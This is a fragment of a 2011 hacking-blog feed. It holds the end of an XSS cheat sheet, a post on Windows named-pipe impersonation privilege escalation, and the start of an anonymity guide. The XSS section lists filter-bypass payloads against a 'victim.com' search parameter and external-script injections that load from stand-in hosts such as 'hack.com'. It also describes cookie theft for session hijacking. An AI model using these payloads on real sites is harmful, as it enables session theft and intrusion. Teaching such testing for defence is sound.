This attack can open several doors for the attacker ranging from session hijacking to entire database compromise.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-IN&quot;&gt;Reflected or Non-persistent XSS attack &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;This is the most common form of XSS attack in which the attackers crafts a malicious code and transfers it to the server side either through the HTTP request parameter or through some HTML form submission. A simple Reflected XSS attack looks like this-&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;lt;script&amp;gt;alert(‘xss’);&amp;lt;/script&amp;gt;&lt;/span&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; (Embedded Script)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;lt;script src=http://hack.com/xss.js&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; (External script)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;Consider this real time example of reflected XSS in 
action:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/12/xss-vulnerability-in-babylon-search.html&quot; target=&quot;_blank&quot;&gt;XSS vulnerability in Babylon Search&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-IN&quot;&gt;Stored or Persistent XSS attack&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;This attack is more dangerous and complicated compared to a reflected XSS attack. In a stored or persistent XSS attack, the malicious script is stored on the target server and is activated when another user views or clicks on the content that carries it. For example, consider a forum where the attacker posts a message containing a link to a malicious script. When another user views the message and clicks it, the script activates and carries out the attack. If the forum renders stored messages without output encoding, simply viewing the message is enough and no click is needed. 
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;The attacker can craft a malicious script like a cookie stealing script of the form &lt;i&gt;&amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;&lt;/i&gt; and steal victims&#39; cookies to perform session hijacking. The form shown only displays the cookies in an alert box, which is how testers demonstrate that they are readable. Session cookies set with the HttpOnly flag are not visible to document.cookie, which limits this kind of theft.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-IN&quot;&gt;DOM based XSS attack&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;DOM or document object model based XSS attacks try to exploit the structure of the page in which they reside. The attacker tries to trick the browser into executing the JavaScript or HTML code of his choice. 
Unlike the other two XSS attacks, a DOM based attack takes advantage of vulnerable javascript which executes directly in the user’s browser.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;Consider the following piece of code:&lt;/span&gt;&lt;br /&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;var loc = document.location + &#39;?gotoHomepage=1&#39;;&lt;br /&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;document.write(&#39;&amp;lt;a href=&quot;&#39; + loc + &#39;&quot;&amp;gt;Home&amp;lt;/a&amp;gt;&#39;);&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-IN&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The value of document.location is controlled by whoever builds the URL, and this code writes it into the page with document.write without any encoding or filtering, so an attacker can use it to pass malicious javascript. 
A url of the form : http://site.com/index.html?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt; &amp;nbsp; can be created and sent to the victim as a link; the payload travels in the URL itself, not in an HTTP header, and is executed directly in the user’s document.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;Complete Cheat Sheet on XSS:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;lt;html&amp;gt;&amp;lt;font color=&quot;Red&quot;&amp;gt;&amp;lt;b&amp;gt;Pwned&amp;lt;/b&amp;gt;&amp;lt;/font&amp;gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;lt;script&amp;gt;alert(&#39;xss&#39;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&#39;xss&#39;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Bypassing Xss Simple Filtration Without Alteration:&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Now we notice, the above script we used for filtration is evolving only a few strings, knowing 
there are bunch of ways and&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;strings to inject a malicious request.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;It&#39;s only filtering &#39;&amp;lt; &amp;gt; /&#39; means leaving hackers with a vast amount of other strings to inject a malicious code.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Now the question is since &#39;&amp;lt;&#39; and &#39;&amp;gt;&#39; are filtered, how we will be able to send a javascript or html code injection?&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Well, the answer is quite easy, javascript can be executed using &#39; and &quot; before the orignal script.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;For instance,&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&#39;)alert(&#39;xss&#39;);&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;This will generate an alert box again on a vulnerable server.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Secondly,&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&quot;);alert(&#39;xss&#39;);&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;This will too generate an alert box on a vulnerable server.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Bypassing Advance Xss Filtration:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Some webmasters filter lot more than this, especially it&#39;s filtered on important sites like gov and org 
sites.&lt;br /&gt;But all depends on their pattern if they are doing this in javascript, we will of course just alter the page but what if&amp;nbsp;the filtration is not in javascript, instead is in html or php or even asp.&lt;br /&gt;There&#39;s nothing impossible, we will try to get as much info about the filtration as much we can.&lt;br /&gt;Supposing a server that have filtered all strings just more than common in a way that it reads the malicious string in the&amp;nbsp;beginning or in the end to avoid and abort it, this of course can be bypassed too!&lt;br /&gt;&lt;br /&gt;An example can be likely so:&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;helloworld&amp;lt;script&amp;gt;alert(&#39;xss&#39;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The above script will bypass filtration for the server that reads the malicious string in the beginning.&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;helloworld&amp;lt;script&amp;gt;alert(&#39;xss&#39;)&amp;lt;script&amp;gt;helloworld&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This will bypass filtration on server that reads whether in the beginning or in the end or at both ends!&lt;br /&gt;Mostly, this kind of filtration isn&#39;t common, so cant be of much use.&lt;br /&gt;Some webmasters also filter the word &#39;xss&#39; so it&#39;s likely to use some other message for making an alert.&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;lt;script&amp;gt;alert(&#39;hello world&#39;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This will bypass message filtration.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Now we will study some more advance filtration bypass.&lt;br /&gt;&lt;br /&gt;Some webmasters just simply define a pattern of a cross-site scripting script that is possibly common.&lt;br /&gt;&lt;br /&gt;In this case, I will mention here the 
full array of strings to inject, bypassing the filtration.&lt;br /&gt;&lt;br /&gt;We will suppose injecting in a search form.&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&#39;hello world&#39;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&quot;hello world&quot;)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(&quot;hello world&quot;);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(/hello world&quot;);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=//&quot;&amp;gt;&amp;lt;script&amp;gt;alert(/hello world/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=abc&amp;lt;script&amp;gt;alert(/hello world/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=abc&quot;&amp;gt;&amp;lt;script&amp;gt;alert(/hello world/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=abc&quot;&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/hello world/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: 
cyan;&quot;&gt;victim.com/search.php?query=abc//abc&quot;&amp;gt;&amp;lt;/script&amp;gt;alert(/hello world/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=000&quot;&amp;gt;&amp;lt;script&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1337);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=000abc&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/1337/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=--&amp;lt;script&amp;gt;&quot;&amp;gt;&amp;lt;/script&amp;gt;alert(/1337/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=pwned&amp;lt;script&amp;gt;document.write(&#39;abc&#39;);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=pwned&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;document.write(1337);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=pwned&#39;)alert(1337);//&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=pwned&quot;;)alert(1337);//&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=pwned&quot;);alert(/pwned/);//&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: 
cyan;&quot;&gt;victim.com/search.php?query=pwned//&quot;&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;location.href=&#39;javascript:alert(/pwned/);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=&quot;&amp;gt;&amp;lt;img src=&#39;javascript:alert(&#39;xss&#39;);&#39;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;victim.com/search.php?query=&quot;&amp;gt;&amp;lt;script src=&#39;http://malicous js&#39;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;These are a few simple and advanced scripts that can be used to check for an XSS vulnerability. If one of them runs, the page is echoing the query value into its HTML without encoding it, and the fix is to encode output for the context it lands in rather than to blacklist individual strings. There are several automatic tools available as well but I would recommend that you first learn the manual method so that you can clearly understand the attack vector. Later on you can switch to automatic tools. In case you know any other XSS script that is missing in this tutorial then you can add it in the comment box and I will update this tutorial along with your name.&lt;br /&gt;Special Thanks :&amp;nbsp;str0ke,USMAN,tushy,Hackman,shubham,Fix&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/1828740309089422641/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/cross-site-scripting-cheat-sheet.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1828740309089422641'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1828740309089422641'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/cross-site-scripting-cheat-sheet.html' title='Cross 
site scripting(XSS) Cheat Sheet - Readers Choice!!'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-dD65XJCdQog/TuTo65U99YI/AAAAAAAAA9g/GO7X1mRErRM/s72-c/images.jpg" height="72" width="72"/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-6219759490814130362</id><published>2011-12-10T00:54:00.001+05:30</published><updated>2011-12-10T01:04:53.923+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><title type='text'>Namedpipe impersonation Attacks</title><content type='html'>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;arial&quot;&gt;&lt;/fb:like&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-Yn4MssQ5JIE/TuJik5ZP6GI/AAAAAAAAA9Y/qkYMnkLGmQo/s1600/win.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;179&quot; src=&quot;http://1.bp.blogspot.com/-Yn4MssQ5JIE/TuJik5ZP6GI/AAAAAAAAA9Y/qkYMnkLGmQo/s200/win.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Privilege escalation through namedpipe impersonation attack was a real issue back 
in 2000 when a flaw in the service control manager allowed any user logged onto a machine to steal the identity of SYSTEM. We haven&#39;t heard a lot about this topic since then. Is it still an issue?&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;First of all, let&#39;s talk about the problem.&lt;br /&gt;&lt;br /&gt;When a process creates a namedpipe server, and a client connects to it, the server can impersonate the client. This is not really a problem, and is really useful when dealing with IPC. The problem arises when the client has more rights than the server. This scenario would create a privilege escalation. It turns out that it was pretty easy to accomplish.&lt;br /&gt;For example, let&#39;s assume that we have 3 processes: server.exe, client.exe and attacker.exe. Server.exe and client.exe have more privileges than attacker.exe. Client.exe communicates with server.exe using a namedpipe. If attacker.exe manages to create the pipe server before server.exe does, then, as soon as client.exe connects to the pipe, attacker.exe can impersonate it and the game is over. The legitimate server can detect that it lost this race by creating its pipe with FILE_FLAG_FIRST_PIPE_INSTANCE, which makes CreateNamedPipe fail when an instance of that name already exists.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-PDc9foU3ZIs/TuJiLtlLdII/AAAAAAAAA9Q/5Tn97Oon8sA/s1600/np.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;290&quot; src=&quot;http://1.bp.blogspot.com/-PDc9foU3ZIs/TuJiLtlLdII/AAAAAAAAA9Q/5Tn97Oon8sA/s640/np.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;First of all there are some flags buried in the CreateFile documentation to give control to the pipe client over what level of impersonation a server can perform. 
They are called the &quot;Security Quality Of Service&quot;.&lt;br /&gt;&lt;br /&gt;There are 4 flags to define the impersonation level allowed.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;SECURITY_ANONYMOUS&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;The server process cannot obtain identification information about the client, and it cannot impersonate the client.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;SECURITY_IDENTIFICATION&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;The server process can obtain information about the client, such as security identifiers and privileges, but it cannot impersonate the client. ImpersonateNamedpipeClient will succeed, but no resources can be acquired while impersonating the client. The token can be opened and the information it contains can be read.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;SECURITY_IMPERSONATION&lt;/u&gt;&lt;/b&gt; - This is the default&lt;br /&gt;The server process can impersonate the client&#39;s security context on its local system. The server cannot impersonate the client on remote systems.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;SECURITY_DELEGATION&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;The server process can impersonate the client&#39;s security context on remote systems.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There are also 2 other flags:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;SECURITY_CONTEXT_TRACKING&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Specifies that any changes a client makes to its security context is reflected in a server that is impersonating it. If this option isn&#39;t specified, the server adopts the context of the client at the time of the impersonation and doesn&#39;t receive any changes. 
This option is honored only when the client and server process are on the same system.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;SECURITY_EFFECTIVE_ONLY&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Prevents a server from enabling or disabling a client&#39;s privilege or group while the server is impersonating.&lt;br /&gt;&lt;br /&gt;Every time you open a pipe in client mode, you need to find out what the server needs to know about you and pass the right flags to CreateFile. And if you do, don&#39;t forget to also pass SECURITY_SQOS_PRESENT, otherwise the other flags will be ignored.&lt;br /&gt;&lt;br /&gt;Unfortunately, you don&#39;t have access to the source code of all the software running on your machine. I bet there are dozens of programs running on my machine right now opening pipes without using the SQOS flags. To &quot;fix&quot; that, Microsoft implemented some restrictions on whom a server can impersonate in order to minimize the chances of being exploited.&lt;br /&gt;&lt;br /&gt;A server can impersonate a client only if one of the following is true.&lt;br /&gt;&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;The caller has the SeImpersonatePrivilege privilege.&lt;/li&gt;&lt;li&gt;The requested impersonation level is SecurityIdentification or SecurityAnonymous.&lt;/li&gt;&lt;li&gt;The identity of the client is the same as the server.&lt;/li&gt;&lt;li&gt;The token of the client was created using LogonUser from inside the same logon session as the server.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Only Administrators/System/SERVICES have the SeImpersonatePrivilege privilege; SERVICES here includes low-privileged service accounts such as LOCAL SERVICE and NETWORK SERVICE, so a compromised service still has to be counted among the possible impersonators. 
If the attacker is a member of these groups, you have much bigger problems.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/6219759490814130362/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/namedpipe-impersonation-attacks.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6219759490814130362'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6219759490814130362'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/namedpipe-impersonation-attacks.html' title='Namedpipe impersonation Attacks'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-Yn4MssQ5JIE/TuJik5ZP6GI/AAAAAAAAA9Y/qkYMnkLGmQo/s72-c/win.jpg" height="72" width="72"/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-6468968895363579875</id><published>2011-12-08T21:34:00.001+05:30</published><updated>2011-12-09T00:15:19.836+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="anonymous hacking group"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><title type='text'>Complete Guide to staying Anonymous on Internet - Combining VMs and 
VPNs</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-hqHLI6fQe3Q/TuD538Q3CVI/AAAAAAAAA9I/JxxRQAewB44/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-hqHLI6fQe3Q/TuD538Q3CVI/AAAAAAAAA9I/JxxRQAewB44/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&quot;the Reason which makes Anonymous hactivists dangerous is that they are really ANONYMOUS - Darklord&quot;&lt;br /&gt;&lt;br /&gt;Hello friends. Sorry for the delay in post. Still waiting for the day when time will be in abundance 